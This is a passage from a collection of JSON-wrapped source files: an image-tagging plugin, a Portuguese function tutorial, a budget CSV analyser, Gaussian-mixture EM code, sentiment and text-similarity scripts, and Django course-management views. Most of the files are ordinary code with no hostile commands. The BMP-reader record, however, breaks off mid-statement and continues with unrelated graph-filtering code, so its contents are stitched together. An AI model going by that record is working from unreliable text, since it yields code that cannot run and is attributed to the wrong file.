+{"seq_id":"208687652","text":"\"\"\"\nCopyright (c) 2016 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\"\"\"\n\nimport os\nimport re\n\nfrom atomic_reactor.plugin import PostBuildPlugin\nfrom atomic_reactor.constants import INSPECT_CONFIG, TAG_NAME_REGEX\nfrom atomic_reactor.util import get_preferred_label_key\n\n\nclass TagFromConfigPlugin(PostBuildPlugin):\n \"\"\"\n Tags image with additional tags found in configuration file\n\n Configuration file must be named \"additional-tags\" and it must\n reside in repository as a sibling of Dockerfile. Each line in file\n is considered as a different tag to be applied. Empty lines and\n tag names containing hyphens are ignored. Tags will be prefixed by\n the value of Name label.\n\n For example, using the following configuration file:\n\n v1.0\n v1.0.1\n\n And assuming the Name label in Dockerfile is set to \"fedora\", the\n image will be tagged as:\n\n fedora:v1.0\n fedora:v1.0.1\n\n If configuration file is not found, this plugin takes no action.\n\n \"\"\"\n key = 'tag_from_config'\n is_allowed_to_fail = False\n\n TAGS_FILENAME = 'additional-tags'\n\n def get_tags(self):\n tags = []\n\n df_dir = self.workflow.source.get_dockerfile_path()[1]\n tags_filename = os.path.join(df_dir, self.TAGS_FILENAME)\n if not os.path.exists(tags_filename):\n self.log.debug('\"%s\" not found. '\n 'No additional tags will be applied.',\n tags_filename)\n return tags\n\n with open(tags_filename) as tags_file:\n for tag in tags_file:\n tag = tag.strip()\n tag_name_is_valid = re.match(TAG_NAME_REGEX, tag) is not None\n\n if tag_name_is_valid and '-' not in tag:\n tags.append(tag)\n else:\n self.log.warning(\"tag '%s' does not match '%s'\"\n \"or includes dashes, ignoring\", tag, TAG_NAME_REGEX)\n\n return tags\n\n def get_component_name(self):\n if not self.workflow.built_image_inspect:\n raise RuntimeError('There is no inspect data for built image. '\n 'Has the build succeeded?')\n\n try:\n labels = self.workflow.built_image_inspect[INSPECT_CONFIG]['Labels']\n name_label = str(get_preferred_label_key(labels, \"name\"))\n name = labels[name_label]\n except KeyError:\n self.log.error('Unable to determine \"name\" from \"Labels\"')\n raise\n\n return name\n\n def run(self):\n tags = self.get_tags()\n\n if tags:\n name = self.get_component_name()\n for i, tag_suffix in enumerate(tags):\n tag = '{}:{}'.format(name, tag_suffix)\n self.log.debug('Using additional tag: %s', tag)\n self.workflow.tag_conf.add_primary_image(tag)\n # Store modified name.\n tags[i] = tag\n\n return tags\n","sub_path":"atomic_reactor/plugins/post_tag_from_config.py","file_name":"post_tag_from_config.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
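The filter in get_tags keeps a line only if it matches TAG_NAME_REGEX and contains no hyphen. That rule can be exercised on its own; the regex below is a stand-in docker-tag pattern for illustration, since the real constant lives in atomic_reactor.constants:

import re

TAG_NAME_REGEX = r'^[\w][\w.-]{0,127}$'  # stand-in pattern, not the project's constant

def keep_tag(tag):
    return re.match(TAG_NAME_REGEX, tag) is not None and '-' not in tag

for t in ['v1.0', 'v1.0.1', 'v1.0-rc1', '']:
    print(t, keep_tag(t))  # the hyphenated and empty entries are rejected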
+{"seq_id":"361371831","text":"\n# Here we define a function\ndef dizer_hello():\n    print(\"Hello World\")\n\n# And we call it like this. A function that is defined but never called\n# has no effect on the program.\ndizer_hello()\n\n# We can call the function as many times as we like\ndizer_hello()\ndizer_hello()\n\n# This function takes two parameters, which are used inside its body\ndef imprimir_maior_numero(numero1, numero2):\n    if numero1 > numero2:\n        print(numero1)\n    else:\n        print(numero2)\n\n# When calling the function, the arguments must be supplied.\n# Note that the parameter numero1 receives the value 10 and numero2 receives\n# the value 20, following the order in which the values were passed.\nimprimir_maior_numero(10, 20) # prints 20\n\nimprimir_maior_numero(5, 1) # prints 5\n\n\n# This function returns a value after it runs\ndef elevar_ao_quadrado(numero):\n    return numero ** 2\n\n# The value returned by the function is stored in the variable resultado.\nresultado = elevar_ao_quadrado(5)\n\nprint(resultado) # prints 25\n","sub_path":"02/exemplos/funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"257965175","text":"import socket\nimport json\n\nJSON_DATA = {\n \"command\": \"accept_connection\",\n \"login\": \"wiki\",\n \"token\": 13019580135609300876,\n \"friend_login\": \"pat\"\n}\n\nif __name__ == '__main__':\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.sendto(json.dumps(JSON_DATA).encode(), (\"localhost\", 2137))\n data, address = sock.recvfrom(1024)\n print(data)\n","sub_path":"Tests/accept_connection_json_test.py","file_name":"accept_connection_json_test.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"530566153","text":"# import data in csv file\nimport logging\nimport os\nimport csv\nfrom pprint import pprint\n\npath = os.path.join(\"Resources\", \"budget_data.csv\")\n\nwith open(path, \"r\") as file:\n    # assumes the csv reader can handle a file of this size\n    # if exceptions thrown, catch and confess\n    try:\n        dict_reader = csv.DictReader(file)\n    except IOError as e:\n        logging.exception('')\n    \n    budget_dicts_list = [dict(ordered_dict) for ordered_dict in dict_reader]\n    # throw error if no exception but still no data\n    if not len(budget_dicts_list):\n        raise ValueError('No data available')\n    \n# data consistency check: check for duplicates\nfor month_dict in budget_dicts_list:\n    multi = False\n    visited_num = 0\n    for inner_month_dict in budget_dicts_list:\n        if inner_month_dict['Date'] == month_dict['Date']:\n            visited_num += 1\n            if visited_num > 1:\n                multi = True\n\n    \n# create new combined dict called budget_dict \nbudget_dict = {}\n# keeping ordered months as a separate list\nordered_months = []\nfor month_dict in budget_dicts_list:\n    budget_dict[month_dict['Date']] = month_dict['Profit/Losses']\n    ordered_months.append(month_dict['Date'])\n    \n    \n# get total number of months\ntot_months = len(budget_dict.keys())\n\nheader = \"Financial Analysis\"\nprint(header)\nprint(\"-\"*(len(header)+10))\nprint(f\"Total Months: {tot_months}\")\n\n\n# get net profit/loss\ntot_pnl = 0\nfor month_key in budget_dict:\n    tot_pnl += int(budget_dict[month_key])\nprint(f\"Total: ${tot_pnl}\")\n\n\n# get average of the changes in \"Profit/Losses\" over the entire period\ncounter = 0\ndiffs_list = []\nfor row_dict in budget_dicts_list:\n    if counter == 0:\n        counter += 1\n        continue\n    diffs_list.append(int(row_dict['Profit/Losses']) - int(budget_dicts_list[counter - 1]['Profit/Losses']))\n    counter += 1\n\navg_change = round((float(sum(diffs_list) / (tot_months - 1))), 2)\nprint(f\"Average Change: ${avg_change}\")\n\n\n# get greatest increase in profits \nmax_diff_index = diffs_list.index(max(diffs_list))\nprint(f\"Greatest Increase in Profits: {budget_dicts_list[max_diff_index + 1]['Date']} (${diffs_list[max_diff_index]})\")\n\n\n# get greatest decrease in profits\nmin_diff_index = diffs_list.index(min(diffs_list))\n# this should not go out of range since we are always skipping record 0\nprint(f\"Greatest Decrease in Profits: {budget_dicts_list[min_diff_index + 1]['Date']} (${diffs_list[min_diff_index]})\")\n\n\n# export results to text file\npybank_output_path = '/home/jupyter/python-challenge/PyBank/analysis/results.txt'\nwith open(pybank_output_path, 'a') as file:\n    # print with pretty formatting\n    file.write(header)\n    file.write(\"\\n\")\n    file.write(\"-\"*(len(header)+10))\n    file.write(\"\\n\")\n    file.write(f\"Total Months: {tot_months}\\n\")\n    file.write(f\"Total: ${tot_pnl}\\n\")\n    file.write(f\"Average Change: ${avg_change}\\n\")\n    file.write(f\"Greatest Increase in Profits: {budget_dicts_list[max_diff_index + 1]['Date']} (${diffs_list[max_diff_index]})\\n\")\n    file.write(f\"Greatest Decrease in Profits: {budget_dicts_list[min_diff_index + 1]['Date']} (${diffs_list[min_diff_index]})\")\n","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
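The month-over-month loop above can be cross-checked by zipping adjacent rows, which removes the manual counter; the sample rows below are shaped like the budget CSV:

rows = [{'Date': 'Jan-2010', 'Profit/Losses': '867884'},
        {'Date': 'Feb-2010', 'Profit/Losses': '984655'},
        {'Date': 'Mar-2010', 'Profit/Losses': '322013'}]
# pair each month with its successor and difference the P/L values
diffs = [int(b['Profit/Losses']) - int(a['Profit/Losses'])
         for a, b in zip(rows, rows[1:])]
print(diffs)                         # [116771, -662642]
print(sum(diffs) / (len(rows) - 1))  # average change, as in the script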
+{"seq_id":"253929165","text":"# -*- coding: UTF-8 -*-\nfrom struct import unpack, pack\n\n\n# 读取并存储 bmp 文件\nclass ReadBMPFile:\n def __init__(self, filePath):\n file = open(filePath, \"rb\")\n # 读取 bmp 文件的文件头 14 字节\n self.bfType = unpack(\"= num_max_iterations:\n break\n\n new_explore_set = set()\n\n # Visit all nodes on the explore list\n for node_id in explore_set:\n unvisited_nodes.remove(node_id)\n adjacent_node_ids = get_adjacent_node_ids(dmrs, node_id) - removed_nodes\n new_explore_set.update(adjacent_node_ids)\n\n # Explore set for the next iteration are the current explore set's adjacent nodes that have not been visited yet\n explore_set = new_explore_set & unvisited_nodes\n current_iter += 1\n\n return unvisited_nodes\n\n\ndef get_adjacent_node_ids(dmrs, node_id):\n \"\"\"\n Retrieve adjacent node ids (regardless of link direction) from the dmrs for node_id\n :param dmrs: DMRS object\n :param node_id: Node id string\n :return: Set of adjacent node id strings\n \"\"\"\n\n return {link.end for link in dmrs.get_out(node_id, itr=True)} | \\\n {link.start for link in dmrs.get_in(node_id, itr=True)}\n","sub_path":"pydmrs/simplification/gpred_filtering.py","file_name":"gpred_filtering.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"202054959","text":"import os\nfrom setuptools import setup\n\n# variables used in buildout\nhere = os.path.abspath(os.path.dirname(__file__))\ntry:\n README = open(os.path.join(here, 'README.md')).read()\nexcept:\n pass # don't know why this fails with tox\n\nrequires = [\n 'attrs',\n 'Pillow',\n 'py>=1.4.31',\n 'python-magic>=0.4.12',\n 'wheel>=0.24.0',\n 'xlrd',\n 'xlwt>=1.1.2',\n 'six',\n 'dcicutils>=0.5.3'\n]\n\ntests_require = [\n 'pytest>=3.0.1',\n 'pytest-mock',\n 'pytest-cov',\n 'tox>=2.5.0',\n]\n\nsetup(\n name='Submit4DN',\n version=open(\"wranglertools/_version.py\").readlines()[-1].split()[-1].strip(\"\\\"'\"),\n description='Tools for data wrangling and submission to data.4dnucleome.org',\n packages=['wranglertools'],\n zip_safe=False,\n author='4DN Team at Harvard Medical School',\n author_email='jeremy_johnson@hms.harvard.edu',\n url='http://data.4dnucleome.org',\n license='MIT',\n classifiers=[\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n ],\n install_requires=requires,\n include_package_data=True,\n tests_require=tests_require,\n extras_require={\n 'test': tests_require,\n },\n setup_requires=['pytest-runner', ],\n entry_points='''\n [console_scripts]\n import_data = wranglertools.import_data:main\n get_field_info = wranglertools.get_field_info:main\n ''',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"287754519","text":"import text2emotion as te\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport flair\n\nflair_sentiment = flair.models.TextClassifier.load('en-sentiment')\ntext = \"I'm furious\"\n\nsid = SentimentIntensityAnalyzer()\nres = sid.polarity_scores(text)\n# key, value = max(res.items(), key=lambda x: x[1])\n\ns = flair.data.Sentence(text)\nflair_sentiment.predict(s)\ntotal_sentiment = s.labels\n# key = total_sentiment[0].value\n# value = total_sentiment[0].score\n\nt2em = te.get_emotion(text)\nkey, value = max(t2em.items(), key=lambda x: x[1])\n\nmodel_dict = {}\nscore = res[\"compound\"]\nif score >= 0.05:\n    model_dict[\"Vader\"] = {\"Emotion\": \"Positive\", 'Score': score}\nelif -0.05 < score < 0.05:\n    model_dict[\"Vader\"] = {\"Emotion\": \"Neutral\", 'Score': score}\nelif score <= -0.05:\n    model_dict[\"Vader\"] = {\"Emotion\": \"Negative\", 'Score': score}\n\nmodel_dict[\"Flair\"] = {\"Emotion\": str(total_sentiment[0].value).capitalize(), 'Score': total_sentiment[0].score}\nif value == 0:\n    model_dict[\"Text2emotion\"] = {\"Emotion\": 'Neutral', 'Score': 1.00}\nelse:\n    model_dict[\"Text2emotion\"] = {\"Emotion\": key, 'Score': value}\n\nprint(model_dict)\npos = 0\nneg = 0\nneu = 0\ntotposscore = 0\ntotnegscore = 0\ntotneuscore = 0\nfor item in model_dict.items():\n    if item[1][\"Emotion\"] == \"Positive\" or item[1][\"Emotion\"] == \"Happy\" or item[1][\"Emotion\"] == \"Surprise\":\n        pos+=1\n        totposscore += item[1][\"Score\"]\n    elif item[1][\"Emotion\"] == \"Negative\" or item[1][\"Emotion\"] == \"Angry\" or item[1][\"Emotion\"] == \"Sad\" or item[1][\"Emotion\"] == \"Fear\":\n        neg+=1\n        totnegscore += abs(item[1][\"Score\"])\n    elif item[1][\"Emotion\"] == 'Neutral':\n        neu+=1\n        totneuscore += abs(item[1][\"Score\"])\nprint(\"Pos: {}, Neg: {}, Neu: {}, PosScore: {}, NegScore: {}\".format(pos,neg,neu,totposscore,totnegscore))\nprint(model_dict[\"Text2emotion\"][\"Emotion\"])\nif pos>=2:\n    print(totposscore/pos)\nelif neg>=2:\n    print(totnegscore/neg)\nelif neu>=2:\n    print(totneuscore / neu)\nelse:\n    print(model_dict[\"Text2emotion\"][\"Score\"])\n# print()\n# print(key)\n# print(value)\n","sub_path":"test/sentiment_test.py","file_name":"sentiment_test.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
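The pos/neg/neu tallying above is a hand-rolled majority vote over the three models; the same idea as a compact helper, with the label groupings mirroring the script:

from collections import Counter

POSITIVE = {'Positive', 'Happy', 'Surprise'}
NEGATIVE = {'Negative', 'Angry', 'Sad', 'Fear'}

def majority(model_dict):
    # collapse each model's emotion to a coarse polarity, then vote;
    # three-way ties fall to whichever polarity was counted first
    def polarity(emotion):
        if emotion in POSITIVE:
            return 'Positive'
        if emotion in NEGATIVE:
            return 'Negative'
        return 'Neutral'
    votes = Counter(polarity(v['Emotion']) for v in model_dict.values())
    return votes.most_common(1)[0][0]

print(majority({'Vader': {'Emotion': 'Negative', 'Score': -0.6},
                'Flair': {'Emotion': 'Negative', 'Score': 0.99},
                'Text2emotion': {'Emotion': 'Angry', 'Score': 0.8}}))  # Negative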
+{"seq_id":"421916863","text":"# -*- coding: utf-8 -*-\r\nimport numpy as np\r\nfrom scipy.stats import norm\r\nimport matplotlib.pyplot as plt\r\n# from matplotlib.ticker import MultipleLocator\r\n\r\n# Reference: test_gmm.py\r\n# 3 mixture components; mu and sigma are set ad hoc inside the function\r\ndef q4func_gmm(n, fill=0.0):\r\n    x = np.zeros(n)\r\n    g = np.random.randn(n)\r\n    u = np.random.rand(n)\r\n    mu = np.array([1.0, 3.0, 5.0])\r\n    sigma = np.array([0.1, 0.3, 0.5])\r\n    flag = (0 <= u) & (u < 1/3) \r\n    x = (mu[0] + sigma[0]*g)*flag\r\n    flag = (1/3 <= u) & (u < 2/3)\r\n    x += (mu[1] + sigma[1]*g)*flag\r\n    flag = (2/3 <= u) & (u <= 1)\r\n    x += (mu[2] + sigma[2]*g)*flag\r\n    return x\r\n\r\n# Reference: p118a.py, p118c.py\r\nn = 1000 # number of samples\r\nm = 5 # number of mixture components\r\nx = q4func_gmm(n)\r\n\r\nL = -np.inf\r\nw = np.ones(m)/m\r\nw = w.reshape(m,1) # turn into a column vector\r\nmu = np.linspace( min(x), max(x), m) # initial means\r\nmu = mu.reshape(m,1)\r\nsigma2 = np.ones(m)/10 # initial variances\r\nsigma2 = sigma2.reshape(m,1)\r\n\r\nLt = L\r\nwt = w\r\nmut = mu\r\nsigma2t = sigma2\r\nt=0\r\ntt = np.array([0]) \r\n\r\nwhile 1:\r\n    tmp1 = np.square(np.tile(x, (m,1)) - np.tile(mu, (1,n)))\r\n    tmp2 = 2 * np.tile(sigma2, (1,n))\r\n    tmp3 = np.tile(w, (1,n)) * np.exp(-tmp1 / tmp2) / np.sqrt(np.pi * tmp2)\r\n    eta = tmp3 / np.tile(np.sum(tmp3, axis=0), (m,1))\r\n    tmp4 = np.sum(eta, axis=1)\r\n    w = tmp4 / n\r\n    w = w.reshape(m, 1)\r\n    mu = (eta.dot(x)) / tmp4\r\n    mu = mu.reshape(m, 1)\r\n    sigma2 = np.sum(tmp1*eta, axis=1) / tmp4\r\n    sigma2 = sigma2.reshape(m,1)\r\n\r\n    Lnew = np.sum(np.log(np.sum(tmp3,axis=0)))\r\n\r\n    wt = np.append(wt,w, axis=1)\r\n    mut = np.append(mut,mu, axis=1)\r\n    sigma2t = np.append(sigma2t,sigma2, axis=1)\r\n\r\n    if Lnew - L < 0.0001:\r\n        break\r\n    L = Lnew\r\n\r\n    Lt = np.append(Lt,L)\r\n    t = t+1\r\n    tt = np.append(tt,t)\r\n\r\n# http://bicycle1885.hatenablog.com/entry/2014/02/14/023734\r\n# https://qiita.com/Tatejimaru137/items/50fb90dd52f194979a13\r\nfig, axs = plt.subplots(2, 2)\r\n\r\nxx = np.arange(0,7,0.01)\r\ny0 = norm.pdf(xx, mu[0], np.sqrt(sigma2[0])) # probability density function\r\ny1 = norm.pdf(xx, mu[1], np.sqrt(sigma2[1]))\r\ny2 = norm.pdf(xx, mu[2], np.sqrt(sigma2[2]))\r\ny3 = norm.pdf(xx, mu[3], np.sqrt(sigma2[3]))\r\ny4 = norm.pdf(xx, mu[4], np.sqrt(sigma2[4]))\r\ny = w[0] * y0 + w[1] * y1 + w[2] * y2 + w[3] * y3 + w[4] * y4\r\n\r\n# axs[0,0].hist(x, bins='auto', normed=True)\r\naxs[0,0].hist(x, bins=100, density=True)\r\naxs[0,0].plot(xx, y, color='r')\r\n# axs[0,0].plot(xx, y0, color='g')\r\n# axs[0,0].plot(xx, y1, color='b')\r\n# axs[0,0].plot(xx, y2, color='y')\r\n\r\n \r\naxs[0,1].plot(wt[0], label=\"w0\")\r\naxs[0,1].plot(wt[1], label=\"w1\")\r\naxs[0,1].plot(wt[2], label=\"w2\")\r\naxs[0,1].plot(wt[3], label=\"w3\")\r\naxs[0,1].plot(wt[4], label=\"w4\")\r\naxs[0,1].set_xlabel('time')\r\n# axs[0,1].set_ylabel('w0, w1, and w2')\r\naxs[0,1].grid(True)\r\n# axs[0,1].xaxis.set_major_locator(MultipleLocator(2)) # integer ticks, every 2\r\naxs[0,1].legend(bbox_to_anchor=(1, 1), loc='upper right')\r\n \r\n \r\naxs[1,0].plot(mut[0], label=\"mu0\")\r\naxs[1,0].plot(mut[1], label=\"mu1\")\r\naxs[1,0].plot(mut[2], label=\"mu2\")\r\naxs[1,0].plot(mut[3], label=\"mu3\")\r\naxs[1,0].plot(mut[4], label=\"mu4\")\r\naxs[1,0].set_xlabel('time')\r\n# axs[1,0].set_ylabel('mu0, mu1, and mu2')\r\naxs[1,0].grid(True)\r\n# axs[1,0].xaxis.set_major_locator(MultipleLocator(2))\r\naxs[1,0].legend(bbox_to_anchor=(1, 1), loc='upper right')\r\n \r\naxs[1,1].plot(np.sqrt(sigma2t[0]), label=\"sigma0\")\r\naxs[1,1].plot(np.sqrt(sigma2t[1]), label=\"sigma1\")\r\naxs[1,1].plot(np.sqrt(sigma2t[2]), label=\"sigma2\")\r\naxs[1,1].plot(np.sqrt(sigma2t[3]), label=\"sigma3\")\r\naxs[1,1].plot(np.sqrt(sigma2t[4]), label=\"sigma4\")\r\naxs[1,1].set_xlabel('time')\r\n# axs[1,1].set_ylabel('sigma0, 1, and 2')\r\naxs[1,1].grid(True)\r\n# axs[1,1].xaxis.set_major_locator(MultipleLocator(2))\r\naxs[1,1].legend(bbox_to_anchor=(1, 1), loc='upper right')\r\n\r\nfig.tight_layout() # tidy up the margins\r\nplt.show()","sub_path":"gmm_mle/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
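The body of the while loop in the record above is the standard EM update for a one-dimensional Gaussian mixture; written out, with eta the responsibilities computed from the current parameters:

\eta_{k,i} = \frac{w_k\,\mathcal{N}(x_i \mid \mu_k, \sigma_k^2)}{\sum_{j=1}^{m} w_j\,\mathcal{N}(x_i \mid \mu_j, \sigma_j^2)}, \qquad
w_k \leftarrow \frac{1}{n}\sum_{i=1}^{n}\eta_{k,i}, \qquad
\mu_k \leftarrow \frac{\sum_i \eta_{k,i}\,x_i}{\sum_i \eta_{k,i}}, \qquad
\sigma_k^2 \leftarrow \frac{\sum_i \eta_{k,i}\,(x_i-\mu_k)^2}{\sum_i \eta_{k,i}}

The loop stops once the log-likelihood L = \sum_i \log \sum_k w_k\,\mathcal{N}(x_i \mid \mu_k, \sigma_k^2) improves by less than 10^{-4}.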
+{"seq_id":"226917548","text":"# -*- encoding: utf-8 -*-\r\n'''\r\n@File   :   similarity.py\r\n@Author :   ShareJing\r\n@Email  :   yymmjing@gmail.com\r\n@Desc   :   Text similarity computation (main entry point)\r\n'''\r\n\r\nfrom utils import load_data\r\nfrom model import BM25Okapi\r\nfrom model import EditDistance\r\nfrom model import SentTranformers\r\n\r\n\r\ndef get_data(in_path):\r\n    data = load_data(in_path)\r\n    \r\n    idx2number = {}\r\n    number2data = {}\r\n    corpus = [] # document collection used for the similarity computation\r\n    for idx, sample in enumerate(data):\r\n        number = sample[\"number\"]\r\n        product = sample[\"product\"]\r\n        component = sample[\"component\"]\r\n        abstract = sample[\"abstract\"]\r\n        description = sample[\"description\"]\r\n        recreation_procedure = sample[\"recreation_procedure\"]\r\n        problem_isolation = sample[\"problem_isolation\"]\r\n\r\n        full_data = {\"product\": product,\r\n                     \"component\": component,\r\n                     \"abstract\": abstract,\r\n                     \"description\": description}\r\n        \r\n        idx2number[idx] = number\r\n        number2data[number] = full_data\r\n        \r\n        # pull whichever fields are needed\r\n        sentence = sample[\"abstract\"] if sample[\"abstract\"] else sample[\"description\"]\r\n        tokenized_sent = sentence.split(\" \") # custom cleaning functions can be plugged in here\r\n        corpus.append(tokenized_sent)\r\n\r\n    return idx2number, number2data, corpus\r\n\r\n    \r\nif __name__ == \"__main__\":\r\n\r\n    print(\"Loading data......\")\r\n    idx2number, number2data, corpus = get_data(\"data/processed_data.json\")\r\n\r\n    # corpus = corpus[:100]\r\n    \r\n    #=======================\r\n    # EditDistance (poor fit for English sentences, fine for English words; suits Chinese sentences) / BM25\r\n    #=======================\r\n    print(\"Initializing models......\")\r\n    ed = EditDistance(corpus)\r\n    # bm25 = BM25Okapi(corpus)\r\n    embedder = SentTranformers(\"paraphrase-distilroberta-base-v1\")\r\n    \r\n    for _ in range(1):\r\n        print(\"---------------------------------\")\r\n        # EditDistance\r\n        # ed_query = input(\"Enter a query: \")\r\n        # return_data = ed.get_top_n(ed_query, corpus, n=5)\r\n\r\n        # BM25\r\n        # bm25_tokenized_query = input(\"Enter a query: \").split(\" \")\r\n        # return_data = bm25.get_top_n(bm25_tokenized_query, corpus, n=5)\r\n\r\n        # Sentence Transformer\r\n        st_query = input(\"Enter a query: \")\r\n        return_data = embedder.get_top_n([st_query], corpus)\r\n\r\n        for ele in return_data:\r\n            number = idx2number[ele[\"idx\"]]\r\n            similarity_data = \" \".join(ele[\"document\"])\r\n            # similarity_full_data = number2data[number]\r\n            \r\n            print(\"number: \", number)\r\n            print(\"similarity_data: \", similarity_data)\r\n            print(\"\\n\")\r\n    \r\n\r\n\r\n    \r\n\r\n","sub_path":"similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"505993726","text":"import json\nfrom datetime import date\n\nimport django\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http.response import HttpResponse\n\nfrom core.decorators import enable_json\nfrom core.models import *\nfrom notifications.models import Notification, \\\n NewAchievementNotification, NewLectureNotification, NewMarkNotification, NewWorkNotification\n\n\ndate_handler = lambda obj: (\n obj.isoformat()\n if isinstance(obj, datetime)\n or isinstance(obj, date)\n else None)\n\n\n@login_required\ndef get_task_result_by_practice(request):\n if \"practice_id\" in request.GET:\n practice_id = request.GET.get(\"practice_id\")\n try:\n practice = Practice.objects.get(id=practice_id)\n\n student_list = []\n for user in User.objects.filter(attended_practices=practice_id):\n student_list.append(user_to_dict(user))\n\n work_list = []\n for work in Work.objects.filter(practice=practice).order_by('end_date'):\n work_dict = model_to_dict(work)\n work_dict['tasks'] = []\n for task in Task.objects.filter(work=work):\n work_dict['tasks'].append(model_to_dict(task))\n work_list.append(work_dict)\n\n mark_list = []\n for mark in Mark.objects.filter(task__work__practice=practice_id):\n mark_list.append(model_to_dict(mark))\n\n response = {'students': student_list,\n 'course': model_to_dict(practice),\n 'works': work_list,\n 'marks': mark_list}\n return HttpResponse(json.dumps(response, default=date_handler), content_type=\"application/json\")\n except ObjectDoesNotExist:\n return HttpResponse(status=404)\n else:\n return HttpResponse(status=400)\n\n\n@login_required\n@enable_json\ndef get_course_attendance(request, **kwargs):\n if \"course_id\" in request.GET:\n course_id = request.GET.get(\"course_id\")\n lecture_list = []\n for lecture in Lecture.objects.filter(course=course_id).order_by('date'):\n lect = model_to_dict(lecture)\n lect['date'] = str(lect['date'])\n lecture_list.append(lect)\n\n attendance_list = []\n for attendance in Attendance.objects.filter(lecture__course=course_id):\n attendance_list.append(model_to_dict(attendance))\n\n student_list = []\n for student in User.objects.filter(attended_courses=course_id):\n student_list.append(user_to_dict(student))\n\n response = {'attendance': attendance_list,\n 'lectures': lecture_list,\n 'students': student_list}\n return response\n else:\n return HttpResponse(status=400)\n\n\n@login_required\n@enable_json\ndef get_works_by_deadline(request, json_data=None):\n django.utils.translation.get_language()\n user = request.user\n deadline_list = []\n\n for deadline in Work.objects.filter(end_date__gte=date.today(), practice__students=user).order_by('end_date'):\n dl = model_to_dict(deadline)\n dl['course'] = deadline.practice.course.id\n dl['course_name'] = deadline.practice.course.name\n deadline_list.append(dl)\n\n return deadline_list\n\n\n@login_required\n@enable_json\ndef list_lectures(request, **kwargs):\n course_id = request.GET['course_id']\n lectures = []\n for lecture in Lecture.objects.filter(course=course_id):\n lectures.append(model_to_dict(lecture))\n return lectures\n\n\n@login_required\n@enable_json\ndef save_lecture(request, json_data=None):\n if not json_data:\n json_data = {}\n data = json_data\n if 'date' in data:\n data['date'] = datetime.fromtimestamp(data['date'] / 1000)\n course = Course.objects.get(id=data['course_id'])\n if course.teacher != request.user:\n return 
HttpResponse(status=403)\n if 'lecture_id' in data:\n lecture = Lecture.objects.get(id=data['lecture_id'])\n lecture.course = course\n if 'date' in data:\n lecture.date = data['date']\n lecture.link = data['link']\n lecture.save()\n return model_to_dict(lecture)\n else:\n lecture = Lecture(course=course, date=data['date'], link=data['link'])\n lecture.save()\n lecture.date = str(lecture.date)\n return model_to_dict(lecture)\n\n\n@login_required\ndef save_mark(request):\n try:\n data = json.loads(request.body)\n data['mark'] = float(data['mark'])\n task = Task.objects.get(id=data['task_id'])\n student = User.objects.get(id=data['student_id'])\n if task.work.practice.teacher != request.user:\n return HttpResponse(status=403)\n if data['mark'] > task.max_mark:\n return HttpResponse(status=400)\n mark, found = Mark.objects.get_or_create(task=task, student=student, defaults={'mark': data['mark']})\n mark.mark = data['mark']\n mark.save()\n return HttpResponse(status=200)\n except ObjectDoesNotExist:\n return HttpResponse(status=404)\n\n\n@login_required\ndef save_attendance(request):\n try:\n data = json.loads(request.body)\n lecture = Lecture.objects.get(id=data['lecture_id'])\n student = User.objects.get(id=data['student_id'])\n flag = data['flag']\n if lecture.course.teacher != request.user:\n return HttpResponse(status=403)\n (att, found) = Attendance.objects.get_or_create(lecture=lecture, student=student, defaults={'flag': flag})\n att.flag = flag\n att.save()\n return HttpResponse(status=200)\n except ObjectDoesNotExist:\n return HttpResponse(status=404)\n\n\n@login_required\n@enable_json\ndef save_work(request, json_data=None):\n data = json_data\n practice = Practice.objects.get(id=data['practice_id'])\n if practice.teacher != request.user:\n return HttpResponse(status=403)\n end_date = datetime.fromtimestamp(data['end_date'] / 1000)\n start_date = datetime.fromtimestamp(data['start_date'] / 1000)\n link = data['link']\n tasks = data['tasks']\n min_mark = 0\n max_mark = 0\n for task in tasks:\n min_mark += int(task['min'])\n max_mark += int(task['max'])\n\n work = Work.objects.create(\n end_date=end_date,\n start_date=start_date,\n link=link,\n practice=practice,\n required_mark=min_mark,\n max_mark=max_mark\n )\n work.save()\n work_dict = model_to_dict(work)\n work_dict['tasks'] = []\n for t in tasks:\n task = Task.objects.create(\n # required_mark=int(t['min']),\n max_mark=int(t['max']),\n work=work\n )\n task.save()\n work_dict['tasks'].append(model_to_dict(task))\n\n return work_dict\n\n\n@login_required\ndef get_notifications(request):\n user = request.user\n notifications = []\n\n for notification in NewAchievementNotification.objects.filter(related_user=user, viewed=False).order_by('time'):\n notifications.append({'id': notification.id,\n 'link': notification.related_link(),\n 'message': notification.__unicode__()})\n\n for notification in NewLectureNotification.objects.filter(related_user=user, viewed=False).order_by('time'):\n notifications.append({'id': notification.id,\n 'link': notification.related_link(),\n 'message': notification.__unicode__()})\n\n for notification in 